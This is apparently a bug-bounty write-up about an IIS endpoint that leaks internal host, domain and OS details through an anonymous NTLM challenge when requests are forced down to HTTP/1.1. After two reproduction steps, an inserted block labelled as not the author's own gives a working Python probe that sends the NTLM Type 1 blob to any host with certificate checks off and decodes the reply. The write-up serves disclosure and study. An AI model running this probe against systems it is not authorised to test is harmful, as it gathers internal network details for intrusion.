NTLM Auth Disclosing Internal System Info via HTTP/2 to HTTP/1.1 Downgrade


Others get bounties, mine is informative!

AbhirupKonwar

Image created by Author using DALL-E 3

Summary

Internal information disclosure using hidden NTLM authentication.

Vulnerability Description

By downgrading the request to the endpoint https://x.x.x.x from HTTP/2 to HTTP/1.1 and sending an anonymous NTLM Type 1 (negotiate) message in the Authorization header (the message an NTLM client sends before any credentials, which is what the "default NTLM hash for a blank username and password" amounts to), the server answers with a base64-encoded NTLM Type 2 (challenge) message in its WWW-Authenticate header. Decoding that challenge with any NTLM challenge decoder reveals internal system information: typically the NetBIOS and DNS names of the host and its domain, and the server's OS version. The downgrade matters because NTLM authenticates the underlying TCP connection rather than each request, which does not fit HTTP/2's multiplexed streams, so IIS offers NTLM only over HTTP/1.1; a client that stays on HTTP/2 never sees the challenge.

IP Verification

https://www.shodan.io/host/x.x.x.x

Check the domains associated with this IP using Shodan. Alternatively, just visit the IP via Chrome and it will display the associated domain in the "security certificate misconfiguration" error page.

Associated domain/subdomain: abc.redacted.com

Steps to Reproduce

1. Visit the endpoint https://x.x.x.x
2. Proxy the request and send it to Burp Suite Repeater.
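The probe described in the Vulnerability Description, written out as an added example (this is not the author's code and not the rest of the write-up's steps): it sends the standard anonymous NTLM Type 1 blob over HTTP/1.1, which is the downgrade the author performs by hand in Repeater, and decodes the Type 2 challenge the way an NTLM challenge decoder does, following the MS-NLMP message layouts. The function names, the sample host and domain names (WEB01, CORP, corp.local) and the build number in `build_sample_type2()` are constructed for offline use and do not describe the target in the write-up; `probe()` performs the real request when given a host.

```python
"""Probe an HTTPS endpoint for NTLM over HTTP/1.1 and decode the Type 2
challenge it returns.  Layouts follow MS-NLMP 2.2.1.1 (NEGOTIATE),
2.2.1.2 (CHALLENGE) and 2.2.2.1 (AV_PAIR).  Example code written for this
page; the host, names and build numbers below are constructed, not real."""
import base64
import http.client
import ssl
import struct
from datetime import datetime, timedelta, timezone

# Anonymous NTLM Type 1 (NEGOTIATE_MESSAGE): "NTLMSSP\0", type 1,
# flags 0x00088207, empty domain and workstation fields (32 bytes).
# This is the blob most NTLM-info probes send; it carries no credentials.
TYPE1_B64 = "TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA="
TYPE1 = base64.b64decode(TYPE1_B64)

NEGOTIATE_UNICODE = 0x00000001      # payload strings are UTF-16LE
NEGOTIATE_TARGET_INFO = 0x00800000  # TargetInfo AV_PAIR list present
NEGOTIATE_VERSION = 0x02000000      # Version field (bytes 48..55) is valid

# AvId -> label for the TargetInfo pairs that leak internal naming.
AV_NAMES = {1: "NetBIOS computer name", 2: "NetBIOS domain name",
            3: "DNS computer name", 4: "DNS domain name", 5: "DNS tree name"}
AV_EOL, AV_TIMESTAMP = 0, 7


def parse_type2(blob: bytes) -> dict:
    """Decode a CHALLENGE_MESSAGE into the fields a challenge decoder shows."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    info = {"target_name": blob[tn_off:tn_off + tn_len].decode(enc),
            "server_challenge": blob[24:32].hex(), "flags": hex(flags)}
    if flags & NEGOTIATE_VERSION:
        major, minor, build, _, rev = struct.unpack_from("<BBH3sB", blob, 48)
        info["os_version"] = f"{major}.{minor} build {build} (NTLM rev {rev})"
    if flags & NEGOTIATE_TARGET_INFO:
        pos, end = ti_off, ti_off + ti_len
        while pos + 4 <= end:
            av_id, av_len = struct.unpack_from("<HH", blob, pos)
            value = blob[pos + 4:pos + 4 + av_len]
            pos += 4 + av_len
            if av_id == AV_EOL:
                break
            if av_id in AV_NAMES:
                info[AV_NAMES[av_id]] = value.decode("utf-16-le")
            elif av_id == AV_TIMESTAMP:  # Windows FILETIME: 100 ns ticks since 1601
                ft = struct.unpack("<Q", value)[0]
                epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
                info["server_time"] = (epoch + timedelta(microseconds=ft // 10)).isoformat()
    return info


def challenge_from_header(www_authenticate: str):
    """Pick the 'NTLM <base64>' token out of a WWW-Authenticate header.
    A bare 'NTLM' (the server's first 401, before any Type 1) yields None."""
    for token in www_authenticate.split(","):
        token = token.strip()
        if token[:5].upper() == "NTLM " and token[5:].strip():
            return parse_type2(base64.b64decode(token[5:].strip()))
    return None


def probe(host: str, path: str = "/", port: int = 443) -> dict:
    """Send the Type 1 over HTTP/1.1.  http.client never negotiates HTTP/2, so
    this is the downgrade done by hand in Burp Repeater.  Certificate checks
    are off because the target is addressed by bare IP and its cert won't match."""
    ctx = ssl.create_default_context()
    ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=10, context=ctx)
    conn.request("GET", path, headers={"Authorization": "NTLM " + TYPE1_B64})
    resp = conn.getresponse()
    header = resp.getheader("WWW-Authenticate") or ""
    conn.close()
    info = challenge_from_header(header)
    if info is None:
        raise RuntimeError(f"no NTLM challenge in response (HTTP {resp.status})")
    return info


def build_sample_type2() -> bytes:
    """Constructed CHALLENGE_MESSAGE for offline use; every value is made up."""
    u16 = lambda s: s.encode("utf-16-le")
    av = lambda av_id, v: struct.pack("<HH", av_id, len(v)) + v
    target_name = u16("CORP")
    target_info = (av(2, u16("CORP")) + av(1, u16("WEB01"))
                   + av(4, u16("corp.local")) + av(3, u16("web01.corp.local"))
                   + av(5, u16("corp.local"))
                   + av(AV_TIMESTAMP, struct.pack("<Q", 133_000_000_000_000_000))
                   + av(AV_EOL, b""))
    flags = (NEGOTIATE_UNICODE | 0x4 | 0x200 | 0x10000
             | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION)
    header = (b"NTLMSSP\x00" + struct.pack("<I", 2)
              + struct.pack("<HHI", len(target_name), len(target_name), 56)
              + struct.pack("<I", flags)
              + bytes.fromhex("0123456789abcdef") + b"\x00" * 8
              + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(target_name))
              + struct.pack("<BBH3sB", 10, 0, 17763, b"\x00" * 3, 15))  # made-up 10.0.17763
    return header + target_name + target_info


def sample_header() -> str:
    """What the server's WWW-Authenticate line looks like for the sample above."""
    return "Negotiate, NTLM " + base64.b64encode(build_sample_type2()).decode()


if __name__ == "__main__":
    import sys
    info = probe(sys.argv[1]) if len(sys.argv) > 1 else challenge_from_header(sample_header())
    for key, value in info.items():
        print(f"{key}: {value}")
```

Run it with no arguments to decode the constructed sample, or with a host to probe a real endpoint. The same parser applies to a challenge captured in Burp: paste the base64 after `NTLM ` from the 401 response's WWW-Authenticate header into `challenge_from_header()`. Note that the server's first 401 usually carries a bare `WWW-Authenticate: NTLM` with no blob; the challenge only appears in the reply to a request that already carries the Type 1.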